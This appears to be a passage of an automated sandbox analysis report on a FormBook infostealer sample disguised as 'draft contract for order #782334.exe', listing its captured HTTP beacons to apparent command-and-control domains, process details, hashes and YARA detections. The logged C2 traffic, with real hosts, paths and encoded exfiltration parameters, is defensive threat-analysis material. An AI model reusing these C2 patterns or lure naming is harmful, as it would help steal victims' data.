                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:20:35.599164963 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1251
                                                                                                                      date: Fri, 01 Nov 2024 08:20:35 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 1, 2024 09:20:35.599276066 CET | 271 | IN
                                                                                                                      Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 62939 | 199.59.243.227 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:40.844985962 CET | 778 | OUT | POST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=o/ybd3tYUBND9rpfZaGKTiMyWfGHqAXTM15xcOngtJZpzKQZMdUUraitMbkHVJenoiMEW9jyyX0VO0QkMASwErP7u5HRCdbsqEy837OsznKuBN8so4pt5d9Umy4F81osaaurri483gw17jU2Cb0BEoA5FoQRqF4ib5P52We7Em4Se8BfqpvSWuJ1E8/8/cWw5w==
                                                                                                                      Nov 1, 2024 09:20:41.499006033 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:41 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: 0790608a-46c8-40bc-a860-cc660fcd03e7
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=0790608a-46c8-40bc-a860-cc660fcd03e7; expires=Fri, 01 Nov 2024 08:35:41 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:41.499053001 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5MDYwOGEtNDZjOC00MGJjLWE4NjAtY2M2NjBmY2QwM2U3IiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      42 | 192.168.2.4 | 62940 | 199.59.243.227 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:43.388987064 CET | 798 | OUT | POST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/BpyqgZPcUUqaitD7keKZe8oiB7W/3yyXwVOwckN3m/F7P52JHTftbsqEy839iCzniuA9MspZpq399Vwi4F2VooaaudrnYW3ls17mw2bq0GNoBTBoRfuQVZVYya/xilay8rSaMF7YOFEutGZ72Iyfr5i2P6YmNZCrpWO6DBakCSRog=
                                                                                                                      Nov 1, 2024 09:20:44.002643108 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:43 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: 9e28c18a-e20f-4d32-846a-5ff225454e61
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=9e28c18a-e20f-4d32-846a-5ff225454e61; expires=Fri, 01 Nov 2024 08:35:43 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:44.002721071 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWUyOGMxOGEtZTIwZi00ZDMyLTg0NmEtNWZmMjI1NDU0ZTYxIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      43 | 192.168.2.4 | 62941 | 199.59.243.227 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:45.985119104 CET | 10880 | OUT | POST /t7p4/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Origin: http://www.deepfy.xyz
                                                                                                                      Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN= [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:46.584163904 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:45 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: f57c2983-d418-44f4-baf8-123af857b7ef
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=f57c2983-d418-44f4-baf8-123af857b7ef; expires=Fri, 01 Nov 2024 08:35:46 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:46.584322929 CET | 563 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjU3YzI5ODMtZDQxOC00NGY0LWJhZjgtMTIzYWY4NTdiN2VmIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      44 | 192.168.2.4 | 62942 | 199.59.243.227 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:48.531167984 CET | 527 | OUT | GET /t7p4/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:49.147416115 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:48 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1470
                                                                                                                      x-request-id: ad042518-c7dc-4927-a596-1fc21ea77822
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a3oOpJnjf7TuHD7GXRsLFGlIQNNofu2e923pTgzW+sjHYqN7IoPdIrbA/IuyWW4qByWJGOJu3t3wueaZtDTziw==
                                                                                                                      set-cookie: parking_session=ad042518-c7dc-4927-a596-1fc21ea77822; expires=Fri, 01 Nov 2024 08:35:49 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a3oOpJnjf7TuHD7GXRsLFGlIQNNofu2e923pTgzW+sjHYqN7IoPdIrbA/IuyWW4qByWJGOJu3t3wueaZtDTziw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:49.147475958 CET | 923 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQwNDI1MTgtYzdkYy00OTI3LWE1OTYtMWZjMjFlYTc3ODIyIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      45 | 192.168.2.4 | 62943 | 103.233.82.58 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:20:54.826970100 CET | 778 | OUT | POST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=RLNhMP4PQQLRIRVE9rUhyR9JUxapmD846yfWaqXbpNTWTNSm0AmtmYSeRcDRAioibKdopEkb4TuLHExe2lXoG4OkmNBQDzAqVe8FHjb49/CYnm4uNOfYWcKmhMDHgWKchCQCIgL/m1ObY3ZHWqgzDiTXnmHVNrEYbeRZgMP6xfv00l4zH0mqSnZ9nb/gxkxWtw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 62944 | 103.233.82.58 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:20:57.385008097 CET | 798 | OUT | POST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo5/WQsimuFStr4Sea8DUEiopbKROpBcb4TqLHEBe2WPrUYOm/9BWHzAqVe8FHnyd9/aYnyEuXvfbb8KlkMDHxGKYhCQgIhWqmzCbY1xHR+00ayTRpGGyMb1rcOkGiqHN8dDV8D1pWFH9An9O6c2U8nMf20MArzOCN6Qs20d2/pV+AfA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 62945 | 103.233.82.58 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:21:00.969888926 CET | 10880 | OUT | POST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Data Ascii: sn0PLN= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port
48 | 192.168.2.4 | 62946 | 103.233.82.58 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:21:03.859931946 CET | 527 | OUT | GET /6byd/?sn0PLN=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:21:05.510509968 CET | 320 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:57 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 162
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                                                                                      Target ID:0
                                                                                                                      Start time:04:16:54
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\draft contract for order #782334.exe"
                                                                                                                      Imagebase:0xd20000
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5 hash:DAB7306BAF4C0E52D2357F48B7A12911
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:04:17:03
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\draft contract for order #782334.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5 hash:DAB7306BAF4C0E52D2357F48B7A12911
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:04:17:29
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe"
                                                                                                                      Imagebase:0x9d0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:7
                                                                                                                      Start time:04:17:31
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\PATHPING.EXE"
                                                                                                                      Imagebase:0x440000
                                                                                                                      File size:16'896 bytes
                                                                                                                      MD5 hash:078AD26F906EF2AC1661FCAC84084256
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:04:17:44
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe"
                                                                                                                      Imagebase:0x9d0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
